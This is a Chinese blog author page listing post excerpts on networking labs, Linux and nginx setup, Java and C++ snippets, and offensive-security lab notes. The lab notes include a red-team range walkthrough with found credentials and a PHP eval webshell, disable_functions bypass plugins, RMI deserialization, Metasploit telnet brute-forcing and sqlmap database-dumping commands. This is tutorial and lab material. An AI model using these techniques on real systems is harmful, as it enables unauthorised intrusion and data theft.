- 博客(83)
- 问答 (1)
- 收藏
- 关注
RSS订阅原创 ATT&CK 红日靶场(三)-简记
端口目录访问 ip/1.php -->根目录、禁用函数!!!-------IP/configuration.php~-->>发现 testuser / cvcvgjASD!更改密码->>123456Step 》写马->>eval($_POST['123']);-》访问error.php--antsward 连接后无法执行命令:antsward-》加载插件-》辅助工具-》绕过disable_fuctions-》PHP7_GC_UAF 、PHP7_Backtrace_UAF。
2023-06-21 18:16:10
1103
翻译 Java RMI Registry 反序列化漏洞(<=jdk8u111)
Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind),在bind过程中,伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象),使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1).漏洞环境执行如下命令编译及启动RMI Registry和服务器:docker-compose b
2021-09-14 14:17:33
1049
原创 telnet认证过程抓包分析
window 10 -》开启telnet client cmd ——> telnet ->? -> telnet 192.168.8.35wireshare抓包:telnet---》逐条分析
2021-02-24 15:02:30
575
原创 telnet用户名密码爆破
攻击机:kali攻击模块:msfconsole -> use auxliary/scanner/telnet/telnet_loginshow optionsmsf5 auxiliary(scanner/telnet/telnet_login) > set rhosts 192.168.8.35rhosts => 192.168.8.35msf5 auxiliary(scanner/telnet/telnet_login) > set user_file ...
2021-02-24 14:49:17
849
原创 masscan
nmap基础扫描扫描单个目标nmap 222.182.111.136扫描多个目标nmap 222.182.111.136 222.182.111.129扫描某个ip段nmap 222.182.111.1-100扫描某个文件内指定的ipnmap -iL /root/target.txt扫描时除开某个ip进行扫描nmap 222.182.111.1/24 -exclude 222.182.111.129扫描时除开某个文件内的ip进行扫描nmap 222.182.111....
2020-10-14 18:05:36
577
原创 sqlmap使用
一、sqlmap常用基础命令sqlmap Common operation command以下命令顺序即为sql注入常见步骤。sqlmap -u [“url”] --dbs #获取数据库sqlmap -u [“url”] --current-user #获取当前用户名称 :sqlmap -u [“url”] --current-db #获取当前数据库名称sqlmap -u [“url”] -D [‘数据库名’] --tables #列出表名 :sqlmap -u [“url”] -D...
2020-08-19 21:33:20
317
原创 Python爬虫
import urllib.requestimport reimport timeimport randomclass GetHtml(object): def __init__(self, URL, HEAD): self.url = URL self.head = HEAD def get_index(self): self.request = urllib.request.Request(self.url)
2020-08-14 18:07:17
146
原创 nginx负载均衡
nginx负载均衡准备条件:三台CentOS6虚拟机分别部署nginx、tomcat、tomcat服务器各一台设置在同一网段CentOS-nginx:IP 10.1.1.1/24安装Nginx:CentOS-tomcat: IP:10.1.1.10/24上传nginx.tar.gz 包后;tar -zxf nginx.tar.gz生成makefile./configure --prefix=/usr/local/nginx --user=nginx --group=nginx
2020-08-12 12:53:40
110
原创 linux网卡配置
命令[root@localhost ~]# vim /etc/sysconfig/network-scripts/ifcfg-eth0TYPE=Ethernet #网卡类型DEVICE=eth0 #网卡接口名称ONBOOT=yes #系统启动时是否自动加载BOOTPROTO=static #启用地址协议 --static:静态协议 --bootp协议 --dhcp协议IPADDR=192.168.1.11 #网卡IP地址...
2020-08-12 10:28:03
157
原创 LNMP
安装php解析环境linuxtar -zxf php-5.3.28yum install libxml2-devel libjpeg libpng-devel./configure --prefix=/usr/local/php5--with-gd --with-zlib--with-config-file-path=/usr/local/php5--enable-mbstring--enable-fpm--with-jpeg-dir=/usr/libmake &am
2020-08-11 19:15:44
183
原创 远程专网实验(vipien):
远程专网实验: 实验准备工作: 三台虚拟机:win2007(CN端)、win2003(VPN服务器)、win2003(USA端)步骤: 三台虚拟机的配置如下:主机名 IP 适配器连接模式 子网掩码 win7-CN 100.1.1.1 仅主机模式 255.255.255.0 win2003-vpn 100.1.1.2 200.1.1.2 网卡1(仅主机) 网卡2 ...
2020-08-04 13:37:58
477
原创 NAT实验
NAT实验拓扑图如下:要求:全网互通 外网可访问服务器步骤如下:1、配置IP、网段、网关配置2、路由配置3内外网地址映射配置命令如下:1)定义内网端口: int f0/0 ip nat inside exit 2)定义外网端口: int f0/1 ip nat outside exit 3)配置PAT(pc访问外网)...
2020-07-31 20:27:58
492
原创 NAT原理
NAT原理及实验NAT1.Network Address Translations 网络地址转换2. ipv4地址严重不够用了 x.x.x.x x0-255 A B C类可以使用 D组播 E科研3. IP地址分为公网IP和私网IP公网IP只能在公网上使用私网IP只能在内网中使用公网上不允许出现私有IP地址!!!!!!私网IP可以重复在内网使用私有IP地址范围:1)10.0.0.0/8 (10开头的)2)172.16.0.0/16...
2020-07-31 20:20:51
180
原创 三层交换机实验演示
三层交换机实验实验拓扑图如下:实验步骤:1、配置trunk 三层交换机以下的虚线连接的端口全部配置为trunk 重要命令: switchport trunk encapsulation dot1Q sw m t2、vtp 在一台三层交换机中配置即可 命令: vtp domain v //v(域名) 3、vlan添加...
2020-07-30 20:27:56
1644
原创 三层交换机技术
三层交换机实验要求如下:涉及到的命令:①trunk 配置trunk命令: int f0/x [switchport trunk encapsulation dot1q/isl] switchport mode trunk exit②vtp vtp domain v(域名)③vlan1)创建VLAN:conf t vlan ID,ID,ID-ID [name 自定义名称] exit2)...
2020-07-29 20:06:35
273
原创 单臂路由和DHCP中继实验
实验拓扑图: 实验图一、一路由器为DHCP服务器①trunk : switchport mode trunk int range f0/3-5②vtp vtp domain v③VLAN Vlan 10 Vlan 20 Vlan 30 Vlan 40 Vlan ...
2020-07-29 14:37:44
413
原创 路由器工作原理
1)一个帧到达路由,路由器首先检查目标MAC地址是否自己,如果不是则丢弃,如果是则解封装,并将IP包送到路由器内部2)路由器检查IP包头中的目标IP,并匹配路由表,如果匹配失败,则丢弃,并向源IP回馈错误信息,如匹配成功,则将IP包路由到出接口。3)封装帧,首先将出接口的MAC地址作为源MAC封装好,然后检查ARP缓存表,检查是否有下一跳的MAC地址,如有,将提取并作为目标MAC地址封装到帧中,如没有,则发送ARP广播请求下一跳的MAC,并获取到对方的mac地址,再记录缓存,并封装帧,最后将帧发送出
2020-07-28 16:21:51
170
原创 路由器工作原理
交换机工作流程如下:交换机收到一个数据帧后:1.首先学习帧中的源MAC地址来形成MAC地址表2.然后检查帧中的目标MAC地址,并匹配MAC地址表: 如表中有匹配项,则单播转发 如表中无匹配项,则除接受端口外广播转发 3.MAC地址表的老化时间默认是300秒(可修改)...
2020-07-28 16:14:06
139
原创 springboot配置文件 server.context-path 路径不起作用
springboot配置文件 server.context-path 路径不起作用server.port=8081server.context-path=/boot02修改:server.port=8081server.servelt.context-path=/boot02原因:springboot版本问题
2020-07-03 11:06:45
858
1
原创 Quartz
quartz在这里插入代码片<bean id="job1" class="org.springframework.scheduling.quartz.MethodInvokingJobDetailFactoryBean"> <property name="targetObject" ref="task"></property> <property name="targetMethod" value="show"></pro
2020-06-19 21:00:08
121
原创 Excel 读取,POI
读取excel数据package com.zy.poi;import org.apache.poi.hssf.usermodel.*;import java.io.FileInputStream;public class Test03 { //读取 public static void main(String[] args) throws Exception { //获取流 FileInputStream fileInputStream =
2020-06-18 14:20:15
121
原创 图片上传功能实现
图片上传功能实现java后端实现代码: @ResponseBody @RequestMapping("/home/updateInfoForm") public Map<String, Object> update(MultipartFile imgFile, @RequestParam Map<String, Object> map, HttpServletRequest request) { if (imgFile != null) {//
2020-06-16 13:36:06
1292
原创 Mybatis中ResultMap映射
Mapper中的代码<resultMap id="BlogMap" type="com.zy.entity.Blog"> <!-- id代表resultMap的主键,而result代表其属性--> <id property="id" column="id"></id> <result property="insertTime" column="insertTime"></result>...
2020-06-11 20:39:54
266
翻译 VMware中,桥接网络、NAT网络模式和仅主机的理解
1. VMware中,该如何理解桥接网络与NAT 网络模式源博客(博主:知识改变命运):https://blog.youkuaiyun.com/u010801439/article/details/531931132.VMware虚拟机三种网络模式详解 (来源:Linux社区 作者:Linux)2.1Bridged(桥接模式):https://www.linuxidc.com/Linux/2016-09/135521.htm什么是桥接模式?桥接模式就是将主机网卡与虚拟机虚拟的网卡利用虚拟...
2020-06-08 17:38:58
145
原创 127.0.0.1、localhost及本机IP的理解
1、localhost是域名,du127.0.0.1是IP地址。你可以打开 windows 安装zhi目录下的 etc 文件dao夹中的 hosts 文件,里面就有一句127.0.0.1 localhost ;绑定IP4下 localhost 指向的IP地址::1 localhost ;绑定IP6下 localhost 指向的IP地址2、本机 IP 就是本机对外放开访问的IP地址。这个网址就是与物理网卡绑定的IP地址,比如,你可以给你的网卡设置I...
2020-06-08 16:30:42
3193
翻译 网络安全【千峰】
局域网又可称为内网单局域网构成:交换机、网线、pc机交换机:用来构建局域网的设备ip地址: 32位二进制组成化成十进制:X.X.X.X X的范围是0-255子网掩码:作用:用来确定IP地址的网络位子网掩码如何确定IP的网络位:与255对应的是网络位置,与0对应的数字为主机位255.0.0.0255.255.0.0255.255.255.0IP地址详解ISO定义五大类:(是以IP地址的第一位进行区分的)A类:1-126 默认子网掩码为...
2020-06-08 13:33:41
557
原创 Error response from daemon: Get https://registry-1.docker.io/v2/: net/http: request canceled
今天,安装docker后使用命令:docker pull mongo 拉取mongoDB镜像时遇到问题:Error response from daemon: Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)-------------------------...
2020-05-18 14:35:18
5294
1
翻译 Mybatis逆向工程理解
一、mapper接口中的方法解析mapper接口中的函数及方法方法 功能说明 int countByExample(UserExample example) thorws SQLException 按条件计数 int deleteByPrimaryKey(Integer id) thorws SQLException 按主键删除 int deleteByExa...
2020-04-10 08:42:23
248
1
转载 类对象定义
#includeusing namespace std;class Coordinate{public: int x; int y; void printX() { cout } void printY() { cout }};int main()
2017-03-15 22:42:49
334
转载 内存管理 new、delete’
#include#includeusing namespace std;int main(){ int *p=new int(10); if(p==NULL) { system("pause"); return 0; } cout delete p; p=NULL;
2017-03-14 14:31:49
206
原创 函数 默认值、重载、内联
#includeusing namespace std;inline void fun(int i,int j=20,int k=30);inline void fun(double i,double j,double k);int main(){ fun(1,2,3); fun(1.2,1.3,1.4);}void fun(int i,int j,
2017-03-10 20:21:45
253
转载 最大、最小值
#include#includeusing namespace std;int getmax_min(int *arr,int count,bool is_max){ int temp; temp=arr[0]; for(int i=1; i { if(is_max) { if(a
2017-03-03 22:43:16
259
转载 bool以及 namespace练习
定义一个命名空间为myNum,在该命名空间中定义一个整型变量x,并给该变量赋值为105; 使用C++新特性判断myNum命名空间下的变量是奇数还是偶数。#include #include using namespace std;namespace myNum //填写命名空间的关键字{int x = 11;}int main()
2017-02-28 23:16:42
967
翻译 关于namespace
#includeusing namespace std;namespace A//命名A空间{int x=1;void fun(){ cout}void fun2(){ cout}}namespace B//命名B空间{int x=8; void fun() { cout }
2017-02-28 22:13:45
320
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人